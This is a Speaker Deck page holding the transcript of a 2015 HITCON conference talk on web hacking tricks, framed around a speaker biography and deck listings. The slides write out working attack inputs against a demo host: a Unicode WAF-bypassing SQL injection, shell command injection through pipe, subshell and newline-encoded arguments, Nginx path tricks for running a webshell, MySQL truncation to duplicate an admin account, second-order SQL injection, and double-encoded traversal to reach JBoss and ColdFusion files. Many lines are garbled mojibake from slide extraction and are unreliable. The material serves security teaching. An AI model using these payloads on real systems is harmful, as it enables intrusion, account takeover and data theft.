那些 Web Hacking 中的奇技淫巧

August 28, 2015

14k

那些 Web Hacking 中的奇技淫巧

HITCON 2015 Community 演講投影片

Orange

August 28, 2015

Tweet

More Decks by Orange

See All by Orange

Best Practices - The Upload

0

92

Security in PHP 那些在滲透測試的小技巧

0

180

網頁安全 Web Security 入門

0

170

Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞

13

36k

關於 HITCON CTF 的那些事之 Web 狗如何在險惡的 CTF 世界中存活？

6

13k

PHPConf 2013 - 矛盾大對決

53

28k

0-Day 輕鬆談 - Happy Fuzzing Internet Explorer

15

12k

駭客看 Django

25

13k

Other Decks in Technology

See All in Technology

未経験者・初心者に贈る！40分でわかるAndroidアプリ開発の今と大事なポイント

6

750

IoT x エッジAI - リアルタイムAI活用のPoCを今すぐ始める方法 -

0

120

Codeful Serverless / 一人運用でもやり抜く力

7

450

使いやすいプラットフォームの作り方ー LINEヤフーのKubernetes基盤に学ぶ理論と実践

PRO

1

160

フルカイテン株式会社エンジニア向け採用資料

0

8.8k

DroidKaigi 2025 Androidエンジニアとしてのキャリア

2

390

Generative AI Japan 第一回生成AI実践研究会「AI駆動開発の現在地──ブレイクスルーの鍵を握るのはデータ領域」

0

330

dbt開発 with Claude Codeのためのガードレール設計

2

1.3k

Unlocking the Power of AI Agents with LINE Bot MCP Server

0

120

「その開発、認知負荷高すぎませんか？」Platform Engineeringで始める開発者体験カイゼン術

PRO

2

870

新アイテムをどう使っていくか？みんなであーだこーだ言ってみよう / 20250911-rpi-jam-tokyo

0

350

Oracle Base Database Service 技術詳細

oracle4engineer

PRO

10

75k

Featured

See All Featured

Building Adaptive Systems

43

2.7k

Site-Speed That Sticks

10

820

Testing 201, or: Great Expectations

45

7.7k

Improving Core Web Vitals using Speculation Rules API

sergeychernyshev

18

1.1k

RailsConf & Balkan Ruby 2019: The Past, Present, and Future of Rails at GitHub

139

34k

The Art of Programming - Codeland 2020

56

13k

CoffeeScript is Beautiful & I Never Want to Write Plain JavaScript Again

162

15k

Documentation Writing (for coders)

74

5k

Imperfection Machines: The Place of Print at Facebook

268

13k

CSS Pre-Processors: Stylus, Less & Sass

358

30k

GitHub's CSS Performance

1032

460k

The Cult of Friendly URLs

79

6.6k

Transcript

掄ⅼ9GD*CEMKPIℎ䥥Ⱘ㕡䃌ト QTCPIG"EJTQQVQTI
#DQWV/G • 蔡政達 a.k.a Orange • CHROOT 成員 / HITCON
成員 / DEVCORE 資安顧問 • 國內外研討會 HITCON, AVTokyo, WooYun 等講師 • 國內外駭客競賽 Capture the Flag 冠軍 • 揭露過 Microsoft, Django, Yahoo, Facebook, Google 等弱點漏洞 • 專精於駭客⼿手法、Web Security 與網路滲透 #90後 #賽棍 #電競選⼿手 #滲透師 #Web狗 #
– 講 Web 可以講到你們聽不懂就贏了聅⬕䇵巼㧤㧪㉩⯻粕ㇰ䮝
– 「⿊黑了你，從不是在你知道的那個點上」 ׅ箞㌈哨䇰㿿׆
– 擺在你眼前是 Feature、擺在駭客眼前就是漏洞 ׅ箞㌈哨䇰㿿׆
- 別⼈人笑我太瘋癲，我笑他⼈人看不穿 ׅ㋾惐哨䇰㿿׆
- 猥瑣「流」 ׅ㋾惐哨䇰㿿׆
None
Q: 資料庫中的密碼破不出來怎麼辦？
ׅⓧ⽅哨䇰㿿׆
第三⽅方內容安全前端安全 DNS 安全 Web應⽤用安全 Web框架安全
後端語⾔言安全 Web伺服器安全資料庫安全作業系統安全 XSS XXE SQL Injection CSRF
第三⽅方內容安全前端安全 DNS 安全 Web應⽤用安全 Web框架安全
後端語⾔言安全 Web伺服器安全資料庫安全作業系統安全 Struts2 OGNL RCE Rails YAML RCE PHP Memory UAF XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection Length Extension Attack ShellShock HeartBleed JSONP Hijacking FastCGI RCE NPRE RCE OVERLAYFS Local Root CSRF Bit-Flipping Attack
⃮㋶䰿⃡緈䥥⻮㔬苌⛋㋶彍⃡緈䥥楫⚬ 第三⽅方內容安全前端安全 DNS 安全 Web應⽤用安全 Web框架
安全後端語⾔言安全 Web伺服器安全資料庫安全作業系統安全 ↛䥥瞗瓴
哪⋬
- Perl 語⾔言特性導致網⾴頁應⽤用程式漏洞 Z
@list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'
=> 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # ? $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈
@list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'
=> 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # wrong! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => ('Ba', 'Ba', 'Banana') }; 2GTN嵿峡箞㌈
@list = ( 'Ba', 'Ba', 'Banana'); $hash = { 'A'
=> 'Apple', 'B' => 'Banana', 'C' => @list }; print Dumper($hash); # correct! $hash = { 'A' => 'Apple', 'B' => 'Banana', 'C' => 'Ba', 'Ba' => 'Banana' }; 2GTN嵿峡箞㌈
$WI<KNNC%8' my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname
=> $cgi->param('realname'), cryptpassword => $password });
$WI<KNNC%8' my $otheruser = Bugzilla::User->create( { login_name => $login_name, realname
=> $cgi->param('realname'), cryptpassword => $password }); # index.cgi? realname=xxx&realname=login_name&realname= admin
- Windows 特性造成網⾴頁應⽤用限制繞過 Z
9KPFQYU箞㌈职㓱傓櫢㒪䠉椱┗ 儿職 • Windows API 檔名正規化特性 - shell.php # shel>.php
# shell"php # shell.< • Windows Tilde 短檔名特性 - /backup/20150707_002dfa0f3ac08429.zip - /backup/201507~1.zip • Windows NTFS 特性 - download.php::$data
– 講些⽐比較特別的應⽤用就好揞勢㭸巼┑箊㙪Ⅷ
┊䠉06(5箞㌈儿職/[53. RNWIKPAFKT椱┗ • MySQL UDF 提權 - MySQL 5.1 -
@@plugin_dir - Custom Dir -> System Dir -> Plugin Dir • 簡單說就是利⽤用 into outfile 建⽴立⺫⽬目錄 - INTO OUTFILE 'plugins::$index_allocation' - mkdir plugins
– 對系統特性的不了解會導致「症狀解」 ׅ箞㌈哨䇰㿿׆
– 講三個較為有趣並被⼈人忽略的特性與技巧 ׅ9GD*CEMKPIℎ䥥Ⱘ㕡䃌ト׆
㹄屰孉䰛ㇰ碍嬭箞㌈ • 問題點 - 未正確的使⽤用正規表⽰示式導致⿊黑名單被繞過 • 範例 - WAF 繞過
- 防禦繞過
- 中⽂文換⾏行編碼繞過網⾴頁應⽤用防⽕火牆規則㎦⭤⃡
http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*三*/FROM dual--
http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual--
http://hackme.cc/view.aspx ?sem=' UNION SELECT(user),null,null,null, &noc=,null,null,null,null,null/*上*/FROM dual-- %u4E0A %u4D0A ...
- 繞過防禦限制繼續 Exploit ㎦⭤Ⅽℬ⃡
for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }
exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg &arg[1]=800 &arg[2]=600
for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }
exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg|sleep 7| &arg[1]=800;sleep 7; &arg[2]=600$(sleep 7)
for($i=0; $i<count($args); $i++){ if( !preg_match('/^\w+$/', $args[$i]) ){ exit(); } }
exec("/sbin/resize $args[0] $args[1] $args[2]"); /resize.php ?arg[0]=uid.jpg%0A &arg[1]=sleep &arg[2]=7%0A
- 繞過防禦限制繼續 Exploit ㎦⭤ⅭℬⅭ
- 駭客透過 Nginx ⽂文件解析漏洞成功執⾏行 Webshell ㎦⭤ⅭℬⅭ 是 PHP 問題，某⽅方⾯面也不算問題(?)所也沒有 CVE
PHP 後⾯面版本以 Security by Default 防⽌止此問題
差不多是這種狀況 http://hackme.cc/avatar.gif/foo.php
; Patch from 80sec if ($fastcgi_script_name ~ ..*/.*php) { return
403; } ㎦⭤ⅭℬⅭ http://www.80sec.com/nginx-securit.html
It seems to work http://hackme.cc/avatar.gif/foo.php
But ... http://hackme.cc/avatar.gif/%0Afoo.php
NewLine security.limit_extensions (>PHP 5.3.9) *QYVQ2CVEJ!
/[53.紉䮝⩬㐬截碍箞㌈ • 問題點 - 對資料不了解，設置了錯誤的語系、資料型態 • 範例 - ⼆二次 SQL
注⼊入 - 字符截斷導致 ...
- 輸⼊入內容⼤大於指定形態⼤大⼩小之截斷㎦⭤⃡
$name = $_POST['name']; $r = query('SELECT * FROM users WHERE
name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...)
mysql> CREATE TABLE users ( -> id INT, -> name
VARCHAR(255), -> pass VARCHAR(255) -> ); Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.00 sec) mysql> INSERT INTO users VALUES(2, 'admin ... x', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+------------------+------+ | id | name | pass | +------+------------------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+------------------+------+ 2 rows in set (0.00 sec)
name: admin ... x *QYVQ'ZRNQKV [space] x 250
CVE-2009-2762 WordPress 2.6.1 Column Truncation Vulnerability *QYVQ'ZRNQKV
- CREATE TABLE users (id INT, name TEXT, ...) ⻰宽瓱6':6⩬㐬㋯熝抇獑
CVE-2015-3440 WordPress 4.2.1 Truncation Vulnerability ⻰宽瓱6':6⩬㐬㋯熝抇獑
- Unicode 編碼之截斷㎦⭤Ⅽ
$name = $_POST['name']; if (strlen($name) > 16) die('name too long');
$r = query('SELECT * FROM users WHERE name=?', $name); if (count($r) > 0){ die('duplicated name'); } else { query('INSERT INTO users VALUES(?, ?)', $name, $pass); die('registed'); } // CREATE TABLE users(id INT, name VARCHAR(255), ...) DEFAULT CHARSET=utf8
mysql> CREATE TABLE users ( -> id INT, -> name
VARCHAR(255), -> pass VARCHAR(255) -> ) DEFAULT CHARSET=utf8; Query OK, 0 rows affected (0.00 sec) mysql> INSERT INTO users VALUES(1, 'admin', 'pass'); Query OK, 1 row affected (0.01 sec) mysql> INSERT INTO users VALUES(2, 'adminx', 'xxd'); Query OK, 1 row affected, 1 warning (0.00 sec) mysql> SELECT * FROM users WHERE name='admin'; +------+-------+------+ | id | name | pass | +------+-------+------+ | 1 | admin | pass | | 2 | admin | xxd | +------+-------+------+ 2 rows in set (0.00 sec)
name: adminx *QYVQ'ZRNQKV
CVE-2013-4338 WordPress < 3.6.1 Object Injection Vulnerability CVE-2015-3438 WordPress <
4.1.2 Cross-Site Scripting Vulnerability *QYVQ'ZRNQKV
- 錯誤的資料庫欄位型態導致⼆二次 SQL 注⼊入⻰宽瓱
#靠北⼯工程師 10418 htp://j.mp/1KiuhRZ
$uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist
VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // CREATE TABLE blacklist(id TEXT, uid TEXT, ...)
$uid = $_GET['uid']; if ( is_numeric($uid) ) query("INSERT INTO blacklist
VALUES($uid)"); $uids = query("SELECT uid FROM blacklist"); foreach ($uids as $uid) { show( query("SELECT log FROM logs WHERE uid=$uid") ); } // uid=0x31206f7220313d31 # 1 or 1=1
sql_mode = strict utf8mb4 *QYVQ2CVEJ!
9GD∛㧮⥉ⓧ⽅㪗㲬䇰㿿 • 問題發⽣生情境 - 使⽤用多個網⾴頁伺服器相互處理 URL ( 如 ProxyPass, mod_jk...
)
http://hackme.cc/jmx-console/
http://hackme.cc/sub/.%252e/ jmx-console/ Deploy to GetShell
• workers.properti es - worker.ajp1.port= 8009 - worker.ajp1.host= 127.0.0.1 -
worker.ajp1.type= ajp13 • uriworkermap.pro perties - /sub/*=ajp1 - /sub=ajp1
http://hackme.cc/sub/../jmx-console/ Apache http://hackme.cc/sub/../jmx-console/ not matching /sub/*, return 404
http://hackme.cc/sub/.%2e/jmx-console/ Apache http://hackme.cc/sub/.%252e/jmx-console/ http://hackme.cc:8080/sub/.%2e/jmx-console/ JBoss http://hackme.cc:8080/sub/../jmx-console/ mod_jk
• HITCON 2014 CTF - 2 / 1020 解出 •
舊版 ColdFusion 漏洞 - ColdFusion with Apache Connector - 舊版本 ColdFusion Double Encoding 造成資訊洩漏漏洞
http://hackme.cc/admin%252f %252ehtaccess%2500.cfm
Apache http://hackme.cc/admin/.htaccess <FilesMatch "^\.ht">, return 403
Apache http://hackme.cc/admin%252f.htaccess /admin%2f.htaccess not found, return 404 http://hackme.cc/admin%2f.htaccess
Apache http://hackme.cc/admin%252f.htaccess%2500.cfm End with .cfm, pass to ColdFusion http://hackme.cc/admin%2f.htaccess%00.cfm ColdFusion
http://hackme.cc/admin/.htaccess .cfm http://hackme.cc/admin%2f.htaccess%00.cfm
*QYVQ2CVEJ!
3#